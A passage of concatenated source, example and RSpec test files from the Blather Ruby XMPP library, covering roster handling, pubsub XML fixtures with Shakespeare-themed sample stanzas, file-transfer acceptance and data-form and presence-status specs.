else @items[key(i.jid)] = RosterItem.new(i)
end
end
end
# Pushes a JID into the roster
#
# @param [String, Blather::JID, #jid] elem a JID to add to the roster
# @return [self]
# @see #push
def <<(elem)
push elem
self
end
# Push a JID into the roster and update the server
#
# @param [String, Blather::JID, #jid] elem a jid to add to the roster
# @param [true, false] send send the update over the wire
# @see Blather::JID
def push(elem, send = true)
jid = elem.respond_to?(:jid) && elem.jid ? elem.jid : JID.new(elem)
@items[key(jid)] = node = RosterItem.new(elem)
@stream.write(node.to_stanza(:set)) if send
end
alias_method :add, :push
# Remove a JID from the roster and update the server
#
# @param [String, Blather::JID] jid the JID to remove from the roster
def delete(jid)
@items.delete key(jid)
item = Stanza::Iq::Roster::RosterItem.new(jid, nil, :remove)
@stream.write Stanza::Iq::Roster.new(:set, item)
end
alias_method :remove, :delete
# Get a RosterItem by JID
#
# @param [String, Blather::JID] jid the jid of the item to return
# @return [Blather::RosterItem, nil] the associated RosterItem
def [](jid)
items[key(jid)]
end
# Iterate over all RosterItems
#
# @yield [Blather::RosterItem] yields each RosterItem
def each(&block)
items.values.each &block
end
# Get a duplicate of all RosterItems
#
# @return [Array<Blather::RosterItem>] a duplicate of all RosterItems
def items
@items.dup
end
# Number of items in the roster
#
# @return [Integer] the number of items in the roster
def length
@items.length
end
# A hash of items keyed by group
#
# @return [Hash<group => Array<RosterItem>>]
def grouped
@items.values.sort.inject(Hash.new{|h,k|h[k]=[]}) do |hash, item|
item.groups.each { |group| hash[group] << item }
hash
end
end
private
# Creates a stripped jid
def self.key(jid)
JID.new(jid).stripped.to_s
end
# Instance method to wrap around the class method
def key(jid)
self.class.key(jid)
end
end # Roster
end # Blather
<file_sep>/spec/fixtures/pubsub.rb
def items_all_nodes_xml
<<-ITEMS
<iq type='result'
from='pubsub.shakespeare.lit'
to='francisco@denmark.lit/barracks'
id='items1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<items node='princely_musings'>
<item id='368866411b877c30064a5f62b917cffe'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>The Uses of This World</title>
<summary>
O, that this too too solid flesh would melt
Thaw and resolve itself into a dew!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T17:47:23Z</published>
<updated>2003-12-12T17:47:23Z</updated>
</entry>
</item>
<item id='3300659945416e274474e469a1f0154c'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Ghostly Encounters</title>
<summary>
O all you host of heaven! O earth! what else?
And shall I couple hell? O, fie! Hold, hold, my heart;
And you, my sinews, grow not instant old,
But bear me stiffly up. Remember thee!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T23:21:34Z</published>
<updated>2003-12-12T23:21:34Z</updated>
</entry>
</item>
<item id='4e30f35051b7b8b42abe083742187228'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Alone</title>
<summary>
Now I am alone.
O, what a rogue and peasant slave am I!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-13T11:09:53Z</published>
<updated>2003-12-13T11:09:53Z</updated>
</entry>
</item>
<item id='ae890ac52d0df67ed7cfdf51b644e901'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Soliloquy</title>
<summary>
To be, or not to be: that is the question:
Whether 'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune,
Or to take arms against a sea of troubles,
And by opposing end them?
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32397</id>
<published>2003-12-13T18:30:02Z</published>
<updated>2003-12-13T18:30:02Z</updated>
</entry>
</item>
</items>
</pubsub>
</iq>
ITEMS
end
def pubsub_items_some_xml
<<-ITEMS
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>.lit/barracks'
id='items1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<items node='princely_musings'>
<item id='368866411b877c30064a5f62b917cffe'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>The Uses of This World</title>
<summary>
O, that this too too solid flesh would melt
Thaw and resolve itself into a dew!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T17:47:23Z</published>
<updated>2003-12-12T17:47:23Z</updated>
</entry>
</item>
<item id='3300659945416e274474e469a1f0154c'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Ghostly Encounters</title>
<summary>
O all you host of heaven! O earth! what else?
And shall I couple hell? O, fie! Hold, hold, my heart;
And you, my sinews, grow not instant old,
But bear me stiffly up. Remember thee!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-12T23:21:34Z</published>
<updated>2003-12-12T23:21:34Z</updated>
</entry>
</item>
<item id='4e30f35051b7b8b42abe083742187228'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Alone</title>
<summary>
Now I am alone.
O, what a rogue and peasant slave am I!
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32396</id>
<published>2003-12-13T11:09:53Z</published>
<updated>2003-12-13T11:09:53Z</updated>
</entry>
</item>
</items>
<set xmlns='http://jabber.org/protocol/rsm'>
<first index='0'>368866411b877c30064a5f62b917cffe</first>
<last>4e30f35051b7b8b42abe083742187228</last>
<count>19</count>
</set>
</pubsub>
</iq>
ITEMS
end
def affiliations_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>'
id='affil1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<affiliations>
<affiliation node='node1' affiliation='owner'/>
<affiliation node='node2' affiliation='owner'/>
<affiliation node='node3' affiliation='publisher'/>
<affiliation node='node4' affiliation='outcast'/>
<affiliation node='node5' affiliation='member'/>
<affiliation node='node6' affiliation='none'/>
</affiliations>
</pubsub>
</iq>
NODE
end
def subscriptions_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='<EMAIL>'
id='affil1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscriptions>
<subscription node='node1' jid='<EMAIL>' subscription='subscribed' subid='fd8237yr872h3f289j2'/>
<subscription node='node2' jid='<EMAIL>' subscription='subscribed' subid='h8394hf8923ju'/>
<subscription node='node3' jid='<EMAIL>' subscription='unconfigured'/>
<subscription node='node4' jid='<EMAIL>' subscription='pending'/>
<subscription node='node5' jid='<EMAIL>' subscription='none'/>
</subscriptions>
</pubsub>
</iq>
NODE
end
def event_with_payload_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'>
<entry xmlns='http://www.w3.org/2005/Atom'>
<title>Soliloquy</title>
<summary>
To be, or not to be: that is the question:
Whether 'tis nobler in the mind to suffer
The slings and arrows of outrageous fortune,
Or to take arms against a sea of troubles,
And by opposing end them?
</summary>
<link rel='alternate' type='text/html'
href='http://denmark.lit/2003/12/13/atom03'/>
<id>tag:denmark.lit,2003:entry-32397</id>
<published>2003-12-13T18:30:02Z</published>
<updated>2003-12-13T18:30:02Z</updated>
</entry>
</item>
</items>
</event>
</message>
NODE
end
def event_notification_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
</message>
NODE
end
def event_subids_xml
<<-NODE
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
<headers xmlns='http://jabber.org/protocol/shim'>
<header name='SubID'>123-abc</header>
<header name='SubID'>004-yyy</header>
</headers>
</message>
NODE
end
def unsubscribe_xml
<<-NODE
<iq type='error'
from='pubsub.shakespeare.lit'
to='<EMAIL>/barracks'
id='unsub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<unsubscribe node='princely_musings' jid='<EMAIL>'/>
</pubsub>
<error type='modify'>
<bad-request xmlns='urn:ietf:params:xml:ns:xmpp-stanzas'/>
<subid-required xmlns='http://jabber.org/protocol/pubsub#errors'/>
</error>
</iq>
NODE
end
def subscription_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='francisco@den<EMAIL>.lit/barracks'
id='sub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscription
node='princely_musings'
jid='<EMAIL>'
subid='ba49252aaa4f5d320c24d3766f0bdcade78c78d3'
subscription='subscribed'/>
</pubsub>
</iq>
NODE
end
def subscribe_xml
<<-NODE
<iq type='set'
from='<EMAIL>.lit/barracks'
to='pubsub.shakespeare.lit'
id='sub1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<subscribe
node='princely_musings'
jid='<EMAIL>'/>
</pubsub>
</iq>
NODE
end
def publish_xml
<<-NODE
<iq type='result'
from='pubsub.shakespeare.lit'
to='hamlet@denmark.lit/blogbot'
id='publish1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<publish node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</publish>
</pubsub>
</iq>
NODE
end
def retract_xml
<<-NODE
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='retract1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<retract node='princely_musings'>
<item id='ae890ac52d0df67ed7cfdf51b644e901'/>
</retract>
</pubsub>
</iq>
NODE
end
<file_sep>/examples/ping_pong.rb
require 'rubygems'
require 'blather/client/dsl'
$stdout.sync = true
module Ping
extend Blather::DSL
def self.run; client.run; end
setup '<EMAIL>', '<PASSWORD>'
status :from => /pong@your\.jabber\.server/ do |s|
puts "serve!"
say s.from, 'ping'
end
message :chat?, :body => 'pong' do |m|
puts "ping!"
say m.from, 'ping'
end
end
module Pong
extend Blather::DSL
def self.run; client.run; end
setup '<EMAIL>', '<PASSWORD>'
message :chat?, :body => 'ping' do |m|
puts "pong!"
say m.from, 'pong'
end
end
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run do
Ping.run
Pong.run
end
<file_sep>/lib/blather/stanza/pubsub/subscriptions.rb
module Blather
class Stanza
class PubSub
# # PubSub Subscriptions Stanza
#
# [XEP-0060 Section 5.6 Retrieve Subscriptions](http://xmpp.org/extensions/xep-0060.html#entity-subscriptions)
#
# @handler :pubsub_subscriptions
class Subscriptions < PubSub
register :pubsub_subscriptions, :subscriptions, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Overrides the parent to ensure a subscriptions node is created
# @private
def self.new(type = nil, host = nil)
new_node = super type
new_node.to = host
new_node.subscriptions
new_node
end
# Overrides the parent to ensure the subscriptions node is destroyed
# @private
def inherit(node)
subscriptions.remove
super
end
# Get or create the actual subscriptions node
#
# @return [Blather::XMPPNode]
def subscriptions
subs = pubsub.find_first('ns:subscriptions', :ns => self.class.registered_ns)
unless subs
self.pubsub << (subs = XMPPNode.new('subscriptions', self.document))
end
subs
end
# Iterate over the list of subscriptions
#
# @yieldparam [Hash] subscription
# @see {#list}
def each(&block)
list.each &block
end
# Get the size of the subscriptions list
#
# @return [Fixnum]
def size
list.size
end
# Get a hash of subscriptions
#
# @example
# { :subscribed => [{:node => 'node1', :jid => '<EMAIL>', :subid => 'fd8237yr872h3f289j2'}, {:node => 'node2', :jid => '<EMAIL>', :subid => 'h8394hf8923ju'}],
# :unconfigured => [{:node => 'node3', :jid => '<EMAIL>'}],
# :pending => [{:node => 'node4', :jid => '<EMAIL>'}],
# :none => [{:node => 'node5', :jid => '<EMAIL>'}] }
#
# @return [Hash]
def list
subscriptions.find('//ns:subscription', :ns => self.class.registered_ns).inject({}) do |hash, item|
hash[item[:subscription].to_sym] ||= []
sub = {
:node => item[:node],
:jid => item[:jid]
}
sub[:subid] = item[:subid] if item[:subid]
hash[item[:subscription].to_sym] << sub
hash
end
end
end # Subscriptions
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/file_transfer.rb
module Blather
# File Transfer helper
# Takes care of accepting, declining and offering file transfers through the stream
class FileTransfer
# Set this to false if you don't want to use In-Band Bytestreams
attr_accessor :allow_ibb
# Set this to false if you don't want to use SOCKS5 Bytestreams
attr_accessor :allow_s5b
# Set this to true if you want SOCKS5 Bytestreams to attempt to use private network addresses
attr_accessor :allow_private_ips
# Create a new FileTransfer
#
# @param [Blather::Stream] stream the stream the file transfer should use
# @param [Blather::Stanza::Iq::Si] iq a si iq used to stream-initiation
def initialize(stream, iq = nil)
@stream = stream
@allow_s5b = true
@allow_ibb = true
Blather.logger.debug "File transfers on the local network are ignored by default. Set #allow_private_ips = true if you need local network file transfers."
@iq = iq
end
# Accept an incoming file-transfer
#
# @param [module] handler the handler for incoming data, see Blather::FileTransfer::SimpleFileReceiver for an example
# @param [Array] params the params to be passed into the handler
def accept(handler, *params)
answer = @iq.reply
answer.si.feature.x.type = :submit
supported_methods = @iq.si.feature.x.field("stream-method").options.map(&:value)
if supported_methods.include?(Stanza::Iq::S5b::NS_S5B) and @allow_s5b
answer.si.feature.x.fields = {:var => 'stream-method', :value => Stanza::Iq::S5b::NS_S5B}
@stream.register_handler :s5b_open, :from => @iq.from do |iq|
transfer = Blather::FileTransfer::S5b.new(@stream, iq)
transfer.allow_ibb_fallback = true if @allow_ibb
transfer.allow_private_ips = true if @allow_private_ips
EM.next_tick { transfer.accept(handler, *params) }
true
end
@stream.write answer
elsif supported_methods.include?(Stanza::Iq::Ibb::NS_IBB) and @allow_ibb
answer.si.feature.x.fields = {:var => 'stream-method', :value => Stanza::Iq::Ibb::NS_IBB}
@stream.register_handler :ibb_open, :from => @iq.from do |iq|
transfer = Blather::FileTransfer::Ibb.new(@stream, iq)
EM.next_tick { transfer.accept(handler, *params) }
true
end
@stream.write answer
else
reason = XMPPNode.new('no-valid-streams')
reason.namespace = Blather::Stanza::Iq::Si::NS_SI
@stream.write StanzaError.new(@iq, 'bad-request', 'cancel', nil, [reason]).to_node
end
end
# Decline an incoming file-transfer
def decline
answer = StanzaError.new(@iq, 'forbidden', 'cancel', 'Offer declined').to_node
@stream.write answer
end
# Offer a file to somebody, not implemented yet
def offer
# TODO: implement
end
# Simple handler for incoming file transfers
#
# You can define your own handler and pass it to the accept method.
module SimpleFileReceiver
def initialize(path, size)
@path = path
@size = size
@transferred = 0
end
# @private
def post_init
@file = File.open(@path, "w")
end
# @private
def receive_data(data)
@transferred += data.size
@file.write data
end
# @private
def unbind
@file.close
File.delete(@path) unless @transferred == @size
end
end
end
end
<file_sep>/spec/blather/stanza/x_spec.rb
require 'spec_helper'
def x_xml
<<-XML
<x xmlns='jabber:x:data'
type='form'>
<title/>
<instructions/>
<field var='field-name'
type='text-single'
label='description' />
<field var='field-name2'
type='text-single'
label='description' />
<field var='field-name3'
type='text-single'
label='description' />
<field var='field-name4'
type='list-multi'
label='description'>
<desc/>
<required/>
<value>field-value4</value>
<option label='option-label'><value>option-value</value></option>
<option label='option-label'><value>option-value</value></option>
</field>
</x>
XML
end
describe Blather::Stanza::X do
it 'can be created from an XML string' do
x = Blather::Stanza::X.new parse_stanza(x_xml).root
expect(x.type).to eq(:form)
expect(x).to be_instance_of Blather::Stanza::X
end
[:cancel, :form, :result, :submit].each do |type|
it "type can be set as \"#{type}\"" do
x = Blather::Stanza::X.new type
expect(x.type).to eq(type)
end
end
it 'is constructed properly' do
n = Blather::Stanza::X.new :form
expect(n.find("/ns:x[@type='form']", :ns => Blather::Stanza::X.registered_ns)).not_to be_empty
end
it 'has an action attribute' do
n = Blather::Stanza::X.new :form
expect(n.type).to eq(:form)
n.type = :submit
expect(n.type).to eq(:submit)
end
it 'has a title attribute' do
n = Blather::Stanza::X.new :form
expect(n.title).to eq(nil)
n.title = "Hello World!"
expect(n.title).to eq("Hello World!")
n.title = "goodbye"
expect(n.title).to eq("goodbye")
end
it 'escapes title properly' do
n = Blather::Stanza::X.new :form
expect(n.title).to eq(nil)
n.title = "<a&a>"
expect(n.title).to eq("<a&a>")
end
it 'has an instructions attribute' do
n = Blather::Stanza::X.new :form
expect(n.instructions).to eq(nil)
n.instructions = "Please fill in this form"
expect(n.instructions).to eq("Please fill in this form")
n.instructions = "goodbye"
expect(n.instructions).to eq("goodbye")
end
it 'escapes instructions properly' do
n = Blather::Stanza::X.new :form
expect(n.instructions).to eq(nil)
n.instructions = "<a&a>"
expect(n.instructions).to eq("<a&a>")
end
it 'inherits a list of fields' do
n = Blather::Stanza::Iq::Command.new
n.command << parse_stanza(x_xml).root
r = Blather::Stanza::X.new.inherit n.form
expect(r.fields.size).to eq(4)
expect(r.fields.map { |f| f.class }.uniq).to eq([Blather::Stanza::X::Field])
end
it 'returns a field object for a particular var' do
x = Blather::Stanza::X.new parse_stanza(x_xml).root
f = x.field 'field-name4'
expect(f).to be_instance_of Blather::Stanza::X::Field
expect(f.value).to eq('field-value4')
end
it 'takes a list of hashes for fields' do
fields = [
{:label => 'label', :type => 'text-single', :var => 'var'},
{:label => 'label1', :type => 'text-single', :var => 'var1'},
]
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, fields
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a list of Field objects as fields' do
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label1]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, control
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'takes a mix of hashes and field objects as fields' do
fields = [
{:label => 'label', :type => 'text-single', :var => 'var'},
Blather::Stanza::X::Field.new(*%w[var1 text-single label1]),
]
control = [ Blather::Stanza::X::Field.new(*%w[var text-single label]),
Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
di = Blather::Stanza::X.new nil, fields
expect(di.fields.size).to eq(2)
di.fields.each { |f| expect(control.include?(f)).to eq(true) }
end
it 'allows adding of fields' do
di = Blather::Stanza::X.new nil
expect(di.fields.size).to eq(0)
di.fields = [{:label => 'label', :type => 'text-single', :var => 'var', :required => true}]
expect(di.fields.size).to eq(1)
di.fields += [Blather::Stanza::X::Field.new(*%w[var1 text-single label1])]
expect(di.fields.size).to eq(2)
end
end
describe Blather::Stanza::X::Field do
subject { Blather::Stanza::X::Field.new nil }
it "should have the namespace 'jabber:x:data'" do
expect(subject.namespace.href).to eq('jabber:x:data')
end
it 'will auto-inherit nodes' do
n = parse_stanza "<field type='text-single' var='music' label='Music from the time of Shakespeare' />"
i = Blather::Stanza::X::Field.new n.root
expect(i.type).to eq('text-single')
expect(i.var).to eq('music')
expect(i.label).to eq('Music from the time of Shakespeare')
end
it 'has a type attribute' do
n = Blather::Stanza::X::Field.new 'var', 'text-single'
expect(n.type).to eq('text-single')
n.type = 'hidden'
expect(n.type).to eq('hidden')
end
it 'has a var attribute' do
n = Blather::Stanza::X::Field.new 'name', 'text-single'
expect(n.var).to eq('name')
n.var = 'email'
expect(n.var).to eq('email')
end
it 'has a label attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.label).to eq('Music from the time of Shakespeare')
n.label = 'Books by and about Shakespeare'
expect(n.label).to eq('Books by and about Shakespeare')
end
it 'has a desc attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.desc).to eq(nil)
n.desc = 'Books by and about Shakespeare'
expect(n.desc).to eq('Books by and about Shakespeare')
n.desc = 'goodbye'
expect(n.desc).to eq('goodbye')
end
it 'has a required? attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.required?).to eq(false)
n.required = true
expect(n.required?).to eq(true)
n.required = false
expect(n.required?).to eq(false)
end
it 'has a value attribute' do
n = Blather::Stanza::X::Field.new 'subject', 'text-single', 'Music from the time of Shakespeare'
expect(n.value).to eq(nil)
n.value = 'book1'
expect(n.value).to eq('book1')
n.value = 'book2'
expect(n.value).to eq('book2')
end
it 'allows multiple values' do
n = Blather::Stanza::X::Field.new 'subject', 'list-multi', 'Music from the time of Shakespeare'
expect(n.value).to eq(nil)
n.value = ['book<&1>', 'book2']
expect(n.value).to eq(['book<&1>', 'book2'])
end
it 'allows setting options' do
di = Blather::Stanza::X::Field.new nil
expect(di.options.size).to eq(0)
di.options = [{:label => 'Person', :value => 'person'}, Blather::Stanza::X::Field::Option.new(*%w[person1 Person1])]
expect(di.options.size).to eq(2)
end
it 'can determine equality' do
a = Blather::Stanza::X::Field.new('subject', 'text-single')
expect(a).to eq(Blather::Stanza::X::Field.new('subject', 'text-single'))
expect(a).not_to equal Blather::Stanza::X::Field.new('subject1', 'text-single')
end
end
describe Blather::Stanza::X::Field::Option do
it 'has a value attribute' do
n = Blather::Stanza::X::Field::Option.new 'person1', 'Person 1'
expect(n.value).to eq('person1')
n.value = 'book1'
expect(n.value).to eq('book1')
end
it 'has a label attribute' do
n = Blather::Stanza::X::Field::Option.new 'person1', 'Person 1'
expect(n.label).to eq('Person 1')
n.label = 'Book 1'
expect(n.label).to eq('Book 1')
n.label = 'Book 2'
expect(n.label).to eq('Book 2')
end
end
<file_sep>/spec/blather/stanza/presence/status_spec.rb
require 'spec_helper'
describe Blather::Stanza::Presence::Status do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:status, nil)).to eq(Blather::Stanza::Presence::Status)
end
it 'must be importable as unavailable' do
expect(Blather::XMPPNode.parse('<presence type="unavailable"/>')).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
end
it 'must be importable as nil' do
expect(Blather::XMPPNode.parse('<presence/>')).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
end
it 'must be importable with show, status and priority children' do
n = Blather::XMPPNode.parse <<-XML
<presence from='<EMAIL>/globe'>
<show>chat</show>
<status>Talk to me!</status>
<priority>10</priority>
</presence>
XML
expect(n).to be_kind_of Blather::Stanza::Presence::Status::InstanceMethods
expect(n.state).to eq(:chat)
expect(n.message).to eq('Talk to me!')
expect(n.priority).to eq(10)
end
it 'can set state on creation' do
status = Blather::Stanza::Presence::Status.new :away
expect(status.state).to eq(:away)
end
it 'can set a message on creation' do
status = Blather::Stanza::Presence::Status.new nil, 'Say hello!'
expect(status.message).to eq('Say hello!')
end
it 'ensures type is nil or :unavailable' do
status = Blather::Stanza::Presence::Status.new
expect { status.type = :invalid_type_name }.to raise_error(Blather::ArgumentError)
[nil, :unavailable].each do |valid_type|
status.type = valid_type
expect(status.type).to eq(valid_type)
end
end
it 'ensures state is one of Presence::Status::VALID_STATES' do
status = Blather::Stanza::Presence::Status.new
expect { status.state = :invalid_type_name }.to raise_error(Blather::ArgumentError)
Blather::Stanza::Presence::Status::VALID_STATES.each do |valid_state|
status.state = valid_state
expect(status.state).to eq(valid_state)
end
end
it 'returns :available if state is nil' do
expect(Blather::Stanza::Presence::Status.new.state).to eq(:available)
end
it 'returns :available if <show/> is blank' do
status = Blather::XMPPNode.parse(<<-NODE)
<presence><show/></presence>
NODE
expect(status.state).to eq(:available)
end
it 'returns :unavailable if type is :unavailable' do
status = Blather::Stanza::Presence::Status.new
status.type = :unavailable
expect(status.state).to eq(:unavailable)
end
it 'ensures priority is not greater than 127' do
expect { Blather::Stanza::Presence::Status.new.priority = 128 }.to raise_error(Blather::ArgumentError)
end
it 'ensures priority is not less than -128' do
expect { Blather::Stanza::Presence::Status.new.priority = -129 }.to raise_error(Blather::ArgumentError)
end
it 'has "attr_accessor" for priority' do
status = Blather::Stanza::Presence::Status.new
expect(status.priority).to eq(0)
status.priority = 10
expect(status.children.detect { |n| n.element_name == 'priority' }).not_to be_nil
expect(status.priority).to eq(10)
end
it 'has "attr_accessor" for message' do
status = Blather::Stanza::Presence::Status.new
expect(status.message).to be_nil
status.message = 'new message'
expect(status.children.detect { |n| n.element_name == 'status' }).not_to be_nil
expect(status.message).to eq('new message')
end
it 'must be comparable by priority' do
jid = Blather::JID.new 'a@b/c'
status1 = Blather::Stanza::Presence::Status.new
status1.from = jid
status2 = Blather::Stanza::Presence::Status.new
status2.from = jid
status1.priority = 1
status2.priority = -1
expect(status1 <=> status2).to eq(1)
expect(status2 <=> status1).to eq(-1)
status2.priority = 1
expect(status1 <=> status2).to eq(0)
end
it 'must should sort by status if priorities are equal' do
jid = Blather::JID.new 'a@b/c'
status1 = Blather::Stanza::Presence::Status.new :away
status1.from = jid
status2 = Blather::Stanza::Presence::Status.new :available
status2.from = jid
status1.priority = status2.priority = 1
expect(status1 <=> status2).to eq(-1)
expect(status2 <=> status1).to eq(1)
end
it 'raises an argument error if compared to a status with a different Blather::JID' do
status1 = Blather::Stanza::Presence::Status.new
status1.from = 'a@b/c'
status2 = Blather::Stanza::Presence::Status.new
status2.from = 'd@e/f'
expect { status1 <=> status2 }.to raise_error(Blather::ArgumentError)
end
([:available] + Blather::Stanza::Presence::Status::VALID_STATES).each do |valid_state|
it "provides a helper (#{valid_state}?) for state #{valid_state}" do
expect(Blather::Stanza::Presence::Status.new).to respond_to :"#{valid_state}?"
end
it "returns true on call to (#{valid_state}?) if state == #{valid_state}" do
method = "#{valid_state}?".to_sym
stat = Blather::Stanza::Presence::Status.new
stat.state = valid_state
expect(stat).to respond_to method
expect(stat.__send__(method)).to eq(true)
end
end
end
<file_sep>/spec/blather/stanza/iq/roster_spec.rb
require 'spec_helper'
def roster_xml
<<-XML
<iq to='<EMAIL>/balcony' type='result' id='roster_1'>
<query xmlns='jabber:iq:roster' ver='3bb607aa4fa0bc9e'>
<item jid='<EMAIL>'
name='Romeo'
subscription='both'>
<group>Friends</group>
</item>
<item jid='<EMAIL>'
name='Mercutio'
subscription='from'>
<group>Friends</group>
</item>
<item jid='<EMAIL>'
name='Benvolio'
subscription='both'>
<group>Friends</group>
</item>
</query>
</iq>
XML
end
describe Blather::Stanza::Iq::Roster do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:query, 'jabber:iq:roster')).to eq(Blather::Stanza::Iq::Roster)
end
it 'ensures newly inherited items are RosterItem objects' do
n = parse_stanza roster_xml
r = Blather::Stanza::Iq::Roster.new.inherit n.root
expect(r.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::Roster::RosterItem])
end
it 'can be created with #import' do
expect(Blather::XMPPNode.parse(roster_xml)).to be_instance_of Blather::Stanza::Iq::Roster
end
it 'retrieves version' do
n = parse_stanza roster_xml
r = Blather::Stanza::Iq::Roster.new.inherit n.root
expect(r.version).to eq '3bb607aa4fa0bc9e'
end
end
describe Blather::Stanza::Iq::Roster::RosterItem do
it 'can be initialized with just a Blather::JID' do
i = Blather::Stanza::Iq::Roster::RosterItem.new 'n@d/r'
expect(i.jid).to eq(Blather::JID.new('n@d/r').stripped)
end
it 'can be initialized with a name' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, 'foobar'
expect(i.name).to eq('foobar')
end
it 'can be initialized with a subscription' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, nil, :both
expect(i.subscription).to eq(:both)
end
it 'can be initialized with ask (subscription sub-type)' do
i = Blather::Stanza::Iq::Roster::RosterItem.new nil, nil, nil, :subscribe
expect(i.ask).to eq(:subscribe)
end
it 'can be initailized with a hash' do
control = { :jid => 'j@d/r',
:name => 'name',
:subscription => :both,
:ask => :subscribe }
i = Blather::Stanza::Iq::Roster::RosterItem.new control
expect(i.jid).to eq(Blather::JID.new(control[:jid]).stripped)
expect(i.name).to eq(control[:name])
expect(i.subscription).to eq(control[:subscription])
expect(i.ask).to eq(control[:ask])
end
it 'inherits a node when initialized with one' do
n = Blather::XMPPNode.new 'item'
n[:jid] = 'n@d/r'
n[:subscription] = 'both'
i = Blather::Stanza::Iq::Roster::RosterItem.new n
expect(i.jid).to eq(Blather::JID.new('n@d/r'))
expect(i.subscription).to eq(:both)
end
it 'has a #groups helper that gives an array of groups' do
n = parse_stanza "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :groups
expect(i.groups.sort).to eq(%w[bar baz foo])
end
it 'has a helper to set the groups' do
n = parse_stanza "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :groups=
expect(i.groups.sort).to eq(%w[bar baz foo])
i.groups = %w[a b c]
expect(i.groups.sort).to eq(%w[a b c])
end
it 'can be easily converted into a proper stanza' do
xml = "<item jid='<EMAIL>' subscription='both'><group>foo</group><group>bar</group><group>baz</group></item>"
n = parse_stanza xml
i = Blather::Stanza::Iq::Roster::RosterItem.new n.root
expect(i).to respond_to :to_stanza
s = i.to_stanza
expect(s).to be_kind_of Blather::Stanza::Iq::Roster
expect(s.items.first.jid).to eq(Blather::JID.new('<EMAIL>'))
expect(s.items.first.groups.sort).to eq(%w[bar baz foo])
end
it 'has an "attr_accessor" for jid' do
